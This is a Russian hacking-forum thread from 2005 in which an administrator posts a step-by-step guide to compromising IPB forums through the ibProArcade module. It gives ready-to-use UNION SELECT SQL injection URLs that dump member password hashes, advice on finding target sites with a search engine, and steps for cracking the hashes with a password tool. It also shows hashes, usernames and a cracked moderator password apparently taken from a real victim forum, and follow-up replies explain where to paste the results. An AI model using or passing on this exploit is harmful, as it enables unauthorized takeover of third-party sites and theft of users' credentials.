Ломаем ibProArcade v2.5.x, аля IPB X.X скачать бесплатно. 10

( Вход | Регистрация )

Твой софтовый форум > Тематические форумы > Хак! Ломать не строить - это уметь надо

Ломаем ibProArcade v2.5.x, аля IPB X.X, sql injection

Дата обновления: 19.09.2005 - 21:13, перейти к новому сообщению

#1
PRYANIK Made In Tula [SoftoRooMTeaM] Группа: Администраторы Сообщений: 31.372 Регистрация: 22.02.2004 Пользователь №: 7 Респектов: 6432	Ломаем ibProArcade v2.5.x, получаем доступ к IPB форуму X.X • 1) Поисковичком шарим в инете на наличие нашего объекта внимания • 2) Браузером отсылаем такой запрос на его сайт Если форум на движке ipb 1.x Цитата \| Quote адресс/index.php?act=Arcade&cat= -1%20UNION%20SELECT%200,0,password,id,name,0,0,0,0,0,0, 0,0,0,0,0,0,0%20FROM%20ibf_members/* для IPB 2.x Цитата \| Quote адресс/index.php?act=Arcade&cat= -1%20UNION%20SELECT%200,0,legacy_password,id,name,0,0,0,0,0,0,0, 0,0,0,0,0,0%20FROM%20ibf_members/* Примерчик: http://www.opresident...0ibf_members/* • 3) Получаем инфу о всякой "полезной лабуде", а вместе с инфой и все пароли пользователей в хэше... Пример, всё из того же форума Начало списка хэша, левый столбец d224e41e79b73a53dcfa86101256c851 ----пароль админа Ник: Ciccio 99f4b99d10c4d7aa96a5cb18477c70a7 ---пароль СуперМодера Ник: BlackyB • 4) Качаем эту прожку _http://www.insidepro....sswordspro.zip • 5) Вбиваем в неё хэшь админа или супра (Из примера, он будет такой, Супра: Code 99f4b99d10c4d7aa96a5cb18477c70a7 ) • 6) Перебираем... • 7) Получаем пароль СуперМодера (из примера) Ник: Нам уже известен BlackyB Пароль: 270774 • 8) Вводим эти данные, наслаждаймся от части своим форумом...для полного прихватизирования, Вам надо расшифровать пасс админа, а мне было в лом это делать -------------------- Не работает ссылка? Пишите в теме, обновим :)! Link not working? Let us know in the comments, we'll fix it! Трудно найти слова, когда действительно есть что сказать. Э.М. Ремарк

◄ Назад

2 Страницы 1 2

Ответов(10 - 12)

19.09.2005 - 18:55 #11
deffer Бывалый Группа: Пользователи Сообщений: 48 Регистрация: 4.08.2005 Пользователь №: 33.092 Респектов: 0 Предупреждений: 1	я чего-то не понял а где вбивать то данные тоесть этот код который получился ?

19.09.2005 - 19:23 #12
PRYANIK Made In Tula [SoftoRooMTeaM] Группа: Администраторы Сообщений: 31.372 Регистрация: 22.02.2004 Пользователь №: 7 Респектов: 6432	QUOTE(deffer @ 19.09.2005 - 19:55) а где вбивать то данные тоесть этот код который получился ? В кукисы или в прогу: _http://www.insidepro....sswordspro.zip , для расшифровки... -------------------- Не работает ссылка? Пишите в теме, обновим :)! Link not working? Let us know in the comments, we'll fix it! Трудно найти слова, когда действительно есть что сказать. Э.М. Ремарк

19.09.2005 - 21:13 #13
deffer Бывалый Группа: Пользователи Сообщений: 48 Регистрация: 4.08.2005 Пользователь №: 33.092 Респектов: 0 Предупреждений: 1	не я понял что в проге... я чего-то не пойму где там.... вставлял в какой-то функции... а там генерируеться несколько паролей

Версия для печати

Вид темы: [ Линейный ] · Стандартный · Режимы сортировки: [ По возрастанию (0-9) ] · По убыванию (9-0)

« Предыдущая тема · Следующая тема »

◄ Назад

2 Страницы 1 2

Сейчас: 29.04.2024 - 15:01

Мобильная версия | Lite версия

SoftoRooM © 2004-2024